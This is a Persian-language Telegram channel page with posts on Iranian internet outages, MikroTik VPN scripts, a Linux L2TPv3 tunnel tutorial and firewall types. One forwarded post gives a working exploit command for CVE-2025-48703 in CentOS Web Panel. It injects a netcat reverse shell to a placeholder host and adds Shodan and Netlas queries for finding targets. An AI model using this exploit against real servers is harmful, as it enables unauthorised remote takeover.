localhost – Telegram
localhost
4.56K subscribers
838 photos
147 videos
48 files
461 links
Download Telegram
https://radar.arvancloud.ir/

از دسترس خارج شد؟
👍16👎7
نت‌بلاکس: داده‌های زنده‌ی شبکه نشان‌دهنده‌ی اختلال قابل‌توجهی در اتصال به #اینترنت در ایران هستند و گزارش‌های گسترده‌ی کاربران درباره‌ی مشکل در دسترسی به اینترنت جهانی را تأیید می‌کنند.
100% packet loss
🤯31🤣10👍2🤝2
طبق شنیده‌ها، گوگل هم در راستای آزادسازی اینترنت بین‌الملل برای مردم توسط دولت فیلتر شده.

-غیر رسمی
🤣32👍2😁2
localhost
15%
5%
🤯21😁2
منتظر بازارگرمی وایت لیستی ها باشید :)
🤣39👍7😁3
فرآیند Failover یک مکانیزم حیاتی در فناوری اطلاعات است که به منظور افزایش پایداری و دسترس‌پذیری سیستم‌ها به کار می‌رود. Failover فرایندی است که در صورت بروز خرابی یا اختلال در سیستم اصلی، به‌صورت خودکار یا دستی، عملیات‌ها را به یک سیستم پشتیبان منتقل می‌کند.

قابل توجه زیرساخت کشور
🤣10👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
👍45🤣8😁2👎1🤝1
اگه نمی‌دونی از کجای برنامه‌نویسی یا دنیای آی‌تی شروع کنی؟ سایت Roadmap.sh دقیقاً همون چیزیه که لازم داری.
مسیر یادگیری هر شاخه مثل فرانت‌اند، بک‌اند، امنیت و کلی چیز دیگه رو مرحله‌به‌مرحله و ساده نشونت میده تا بدون سردرگمی چی رو کی و چطور یاد بگیری. یه جور نقشه راهه واسه رسیدن به دانش و آگاهی شغل و یا تخصص مورد نظرت.
👍177👎1
Forwarded from EYE
CVE-2025-48703: RCE in Centos7 Web Panel

The vulnerability allows an attacker to bypass the authentication process and perform code injection.

Exploit:
curl -kis 'https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc 1.2.3.4 9999 -e /bin/bash`'


Query:
Netlas.io: http.headers.server:"cwpsrv"
Shodan: Server: “cwpsrv”
4👍1👎1
برای اتصال L2TPv3 دریابید.
6
This media is not supported in your browser
VIEW IN TELEGRAM
آموزش بهینه کردن سرعت سایت
👍142👎1
localhost
برای اتصال L2TPv3 دریابید.
Media is too big
VIEW IN TELEGRAM
آموزش راه اندازی تانل ریورس L2TPv3 روی سیستم عامل میکروتیک
👍82👎1
localhost
آموزش راه اندازی تانل ریورس L2TPv3 روی سیستم عامل میکروتیک
ip firewall nat add  chain=srcnat action=masquerade
/ip pool
add name=vpn ranges=172.31.0.2-172.31.0.231
/ppp profile
add change-tcp-mss=yes local-address=172.31.0.1 name=vpn remote-address=vpn use-encryption=yes dns-server=8.8.8.8 use-mpls=default use-compression=default
/interface l2tp-server server
set default-profile=vpn enabled=yes ipsec-secret=123456 use-ipsec=yes
/ip ipsec proposal
set [ find default=yes ] enc-algorithms=3des
/interface pptp-server server
set default-profile=vpn enabled=yes authentication=chap,pap,mschap1,mschap2


اسکریپت آماده فعال سازی L2TP وPPTP و پروفایل vpn بهمراه ip pool
👍121
آموزش راه اندازی L2TPv3 بر روی لینوکس:


تونل Layer 2 (مانند Ethernet) بین دو سرور با آی‌پی ثابت، مثلاً:

سرور ایران: IRAN_IP = 185.10.10.1
سرور خارج: KHAREJ_IP = 45.88.88.1

Tunnel ID: 100
Session ID: 200

 روی هر دو سرور:sudo apt update
sudo apt install iproute2
پیکربندی سرور ایران:sudo ip l2tp add tunnel tunnel_id 100 peer_tunnel_id 100 \
encap udp local 185.10.10.1 remote 45.88.88.1 \
udp_sport 1701 udp_dport 1701

sudo ip l2tp add session tunnel_id 100 session_id 200 peer_session_id 200 \
name l2tp0

sudo ip link set l2tp0 up
sudo ip addr add 192.168.100.1/30 dev l2tp0
پیکربندی روی سرور خارج:sudo ip l2tp add tunnel tunnel_id 100 peer_tunnel_id 100 \
encap udp local 45.88.88.1 remote 185.10.10.1 \
udp_sport 1701 udp_dport 1701

sudo ip l2tp add session tunnel_id 100 session_id 200 peer_session_id 200 \
name l2tp0

sudo ip link set l2tp0 up
sudo ip addr add 192.168.100.2/30 dev l2tp0
برای تست اتصال هم آیپی آدرس لوکالی که در نظر گرفتی رو تست میکنی. اگر پینگ داد یعنی اوکی شده و بدون مشکل به نتیجه رسیده.


نکته: می‌تونید پورت UDP 1701 رو فقط بین این دو IP باز بذارید.

برای پایداری، این دستورات باید داخل فایل systemd یا اسکریپت بوت مثل /etc/rc.local قرار بگیرن. چون با ریبوت، از بین میره.

من خودم این رو تست نکردم، تست کنید و نتیجه رو به منم بگید.
10👎2👍1
انواع فایروال📶

1- stateless packet filtering
ساده‌ترین فایروال! فقط هدر بسته‌های IP رو نگاه می‌کنه:
IP Source/Destination, Port, Protocol.
هیچ اطلاعاتی از وضعیت سشن نداره.
برای مثال اگر که میگیم به یک IP روی پورت 80 باید براش قانون برگشت هم بنویسیم که بگیم از همون IP روی پورت 80 اجازه‌ی ارسال بسته وجود دارد.
مانند:
Linux IPTABLES
Cisco ACL

2- Stateful packet filtering
این مدل وضعیت اتصال (Session Table) رو نگه می‌داره. یعنی متوجه میشه که اگر به یک IP روی پورت 80 درخواست ارتباط مجاز است, پس از همون IP روی پورت 80 هم درخواست مجاز است و لازم به نوشتن یک قانون دیگه براش نیست.
مانند :
Cisco ASA
FortiGate
Palo Alto

3- Application proxy
یک واسطه بین سرور و کاربر است.
کاربر درخواست هارو به پروکسی ارسال میکنه, پروکسی اون محتوای اون درخواست رو کامل چک میکنه و سپس درخواست رو برای سرور ارسال میکنه .
مانند:
Fortiweb
F5

4- UTM
همون stateful firewall است, اما اینجا فقط پورت و IP چک نمیشود بلکه تک تک محتوای ترافیک با ابزار هایی مانند Ips و antivirus و …بررسی میشود.
تفاوتش با app proxy ها در این است که UTM ترافیک را در حین انتقال بررسی میکند, اما app proxy ها مانند یک واسط درخواست رو میگیره, کامل بررسی میکنه و سپس انتقال میده.
مانند:
FortiGate (UTM Mode)
Cisco Firepower
Please open Telegram to view this post
VIEW IN TELEGRAM
16🤣1
خاورمیانه ای بودن بس نبود، شبکه کار هم شدیم...
😁47🤣121🤯1